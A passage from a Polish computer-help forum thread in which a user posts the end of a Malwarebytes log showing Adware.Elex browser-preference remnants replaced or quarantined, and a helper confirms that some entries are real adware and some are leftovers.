user), Zastąpiono,[d3c4c9726346f24498573e5a2fd2649c]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: (n the application exits.
*
* To make a manual change to preferences, you can visit the URL about:config
*/

user_pref(".src", "123456");
user_pref(".user_id", "09B0185A-AC43-4FE3-A796-6007A8DD6F49"), Zastąpiono,[455259e2f7b2f145cd22bddb4fb2728e]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: (to preferences, you can visit the URL about:config
*/

user_pref(".src", "123456");
user_pref(".user_id", "09B0185A-AC43-4FE3-A796-6007A8DD6F49");
user_pref("accessibility.typeaheadfind", true);
user_), Zastąpiono,[059243f8dbce86b0d21d673102ff728e]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: ( changes will be overwritten when the application exits.
*
), Zastąpiono,[1e79e457a8019b9bd718e5b3e61b11ef]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: (-6007A8DD6F49");
user_pref("accessibility.typeaheadfind", true);
user_pref("accessibility.typeaheadfind.flashBar", 0);
user_pref("app.update.auto", false);
user_pref("app.up), Zastąpiono,[e5b2e8534b5e5ed87d7256429b66b749]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\searchplugins\9d4v836a.xml, Przeniesiono do kwarantanny, [6c2b36055a4fb3832dc1c2d66f92f20e],

Sektory fizyczne: 0
(Nie wykryto zagrożeń)


(end)


nwm czy to prawdziwe trojany czy pozostalosci
 System operacyjny: windows_seven Przeglądarka: firefox
#8
RE: QQime chinski shit ,logi.
Cytat:czy to prawdziwe trojany czy pozostalosci
Część to pozostałosci, ale część to realne Trojany\adware.
Dobrze, że użyłeś tego MBAM.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#9
RE: QQime chinski shit ,logi.
Wiec to juz chyba koniec dzieki za pomoc
 System operacyjny: windows_seven Przeglądarka: firefox
Programy: Polecane / Nowe / Inne




Podobne wątki (QQime chinski shit ,logi.)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Jakieś chińskie gówno QQime.exe hubertov 4 2323 16.05.2017, 19:34
Ostatni post: hubertov
  [LOGI] Trojan na komputerze i mp3. LOGI OTL i RSIT kamilzielinski 13 3515 21.04.2011, 21:20
Ostatni post: broda99
  Logi, Logi i jeszcze raz Logi ; ) bazio13 2 986 17.02.2010, 19:17
Ostatni post: bazio13

Skocz do:


Wybrane wątki (QQime chinski shit ,logi.)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
Ściana Czyszczenie Logami desant 4 2200 24.02.2018 22:42
Ostatni post: desant
  Samoczynne otwieranie się folderu SYSWOW64 hexamn 10 3239 24.02.2018 02:32
Ostatni post: Illidan
  Samoistne otwieranie niechcianych stron, użycie procesora w 100% czesio92 8 1823 17.02.2018 23:07
Ostatni post: czesio92
  LOGI - Problem z FPS i niechciane okna w przeglądarce Tosieko 8 2149 17.02.2018 21:58
Ostatni post: broda99
  Proszę o sprawdzenie logów (wątek: Informacja o zablokowaniu komputera) MMilka 2 1954 13.02.2018 17:23
Ostatni post: broda99
  Prośba o sprawdzenie logów dawcios99 1 1436 04.02.2018 23:36
Ostatni post: morderca
  Podejrzenie wirusa Mały Miki 4 1515 21.01.2018 22:22
Ostatni post: Mały Miki
  Dziwne wyszukiwarki w przeglądarkach qutliva 15 3657 18.01.2018 11:47
Ostatni post: madmax86
  Laptop wolno chodzi Adrian3276 4 2125 08.01.2018 11:48
Ostatni post: shreder
  Zużycie GPU 100% morsu 1 2007 07.01.2018 11:50
Ostatni post: morderca
  Reklamy, wyskakujące okno cmd Mogilny 7 1598 06.01.2018 19:09
Ostatni post: morderca
  Dysk twardy sam się zapełnia mka100 3 1539 01.01.2018 20:33
Ostatni post: raxer
  Przeglądarka pochłania wielkie zasoby pamięci RAM. Cebulciax 1 1494 31.12.2017 07:34
Ostatni post: broda99
  Odpalanie ruskich stron mikeal222 5 1345 31.12.2017 03:21
Ostatni post: broda99
  Wyskakujące reklamy - sprawdzenie logów jasonpawulo 6 1250 30.12.2017 22:29
Ostatni post: jasonpawulo